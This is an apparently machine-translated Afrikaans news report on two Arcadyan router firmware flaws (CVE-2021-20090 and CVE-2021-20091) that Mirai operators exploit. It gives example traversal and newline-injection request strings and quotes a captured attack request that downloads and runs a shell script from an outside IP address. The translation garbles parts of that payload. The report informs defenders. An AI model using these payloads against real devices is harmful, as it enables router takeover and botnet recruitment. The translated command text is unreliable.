'n Massiewe aanval is op die netwerk aangeteken teen tuisroeteerders wie se firmware 'n HTTP-bedienerimplementering van die Arcadyan-maatskappy gebruik. Om beheer oor toestelle te verkry, word 'n kombinasie van twee kwesbaarhede gebruik wat afstanduitvoering van arbitrêre kode met wortelregte moontlik maak. Die probleem raak 'n redelike wye reeks ADSL-roeteerders van Arcadyan, ASUS en Buffalo, sowel as toestelle wat onder die Beeline-handelsmerke verskaf word (die probleem word bevestig in Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone en ander telekommunikasie-operateurs. Daar word kennis geneem dat die probleem al meer as 10 jaar in Arcadyan-firmware teenwoordig is en gedurende hierdie tyd daarin geslaag het om na ten minste 20 toestelmodelle van 17 verskillende vervaardigers te migreer.
Die eerste kwesbaarheid, CVE-2021-20090, maak dit moontlik om toegang tot enige webkoppelvlakskrif sonder verifikasie te verkry. Die essensie van die kwesbaarheid is dat in die webkoppelvlak sommige dopgehou waardeur beelde, CSS-lêers en JavaScript-skrifte gestuur word sonder verifikasie toeganklik is. In hierdie geval word dopgehou waarvoor toegang sonder verifikasie toegelaat word, nagegaan met die aanvanklike masker. Die spesifikasie van “../”-karakters in paaie om na die ouergids te gaan, word deur die firmware geblokkeer, maar die gebruik van die “..%2f”-kombinasie word oorgeslaan. Dit is dus moontlik om beskermde bladsye oop te maak wanneer versoeke soos "http://192.168.1.1/images/..%2findex.htm" gestuur word.
Die tweede kwesbaarheid, CVE-2021-20091, laat 'n geverifieerde gebruiker toe om veranderinge aan die stelselinstellings van die toestel aan te bring deur spesiaal geformateerde parameters na die application_abstract.cgi-skrip te stuur, wat nie kyk vir die teenwoordigheid van 'n nuwelynkarakter in die parameters . Byvoorbeeld, wanneer 'n ping-operasie uitgevoer word, kan 'n aanvaller die waarde "192.168.1.2%0AARC_SYS_TelnetdEnable=1" spesifiseer in die veld met die IP-adres wat nagegaan word, en die skrip, wanneer die instellingslêer /tmp/etc/config/ geskep word .glbcfg, sal die reël "AARC_SYS_TelnetdEnable=1" daarin skryf ", wat die telnetd-bediener aktiveer, wat onbeperkte opdragdop-toegang met wortelregte bied. Net so, deur die AARC_SYS parameter te stel, kan jy enige kode op die stelsel uitvoer. Die eerste kwesbaarheid maak dit moontlik om 'n problematiese skrif sonder verifikasie te laat loop deur dit as "/images/..%2fapply_abstract.cgi" te verkry.
Om kwesbaarhede te ontgin, moet 'n aanvaller 'n versoek kan stuur na die netwerkpoort waarop die webkoppelvlak loop. Te oordeel aan die dinamika van die verspreiding van die aanval, laat baie operateurs toegang op hul toestelle vanaf die eksterne netwerk om die diagnose van probleme deur die ondersteuningsdiens te vereenvoudig. As toegang tot die koppelvlak slegs tot die interne netwerk beperk is, kan 'n aanval vanaf 'n eksterne netwerk uitgevoer word deur die "DNS-herbinding"-tegniek te gebruik. Kwesbaarhede word reeds aktief gebruik om routers aan die Mirai-botnet te koppel: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Verbinding: sluit Gebruiker-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; krul+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Bron: opennet.ru